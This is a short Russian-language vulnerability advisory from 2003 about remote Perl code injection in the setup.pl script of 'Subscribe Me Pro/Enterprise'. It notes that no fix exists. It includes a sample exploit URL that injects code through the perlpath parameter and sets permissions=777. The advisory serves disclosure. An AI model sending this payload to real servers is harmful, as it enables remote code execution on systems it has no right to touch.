Security Lab

Выполнение произвольного perl кода в 'Subscribe Me Pro' и 'Subscribe Me Enterprise'

Дата публикации:23.12.2003
Всего просмотров:1218
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: “Subscribe Me”

Описание: Уязвимость обнаружена в 'Subscribe Me Pro' и 'Subscribe Me Enterprise'. Удаленный пользователь может выполнить произвольные команды оболочки на целевой системе.

Уязвимость в сценарии 'setup.pl' позволяет удаленному пользователю внедрить произвольный Perl код, который будет выполнен на целевом сервере. Пример:

http://[target]/cgi-bin/setup.pl?RUNINSTALLATION=yes&information=~&extensi on=pl&config=pl&permissions=777&os=notunixornt&perlpath=
%20."&websiteurl=evilhacker&br_username=evilhacker&session_id=0&cgipath=.

URL производителя: http://www.siteinteractive.com/subpro/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.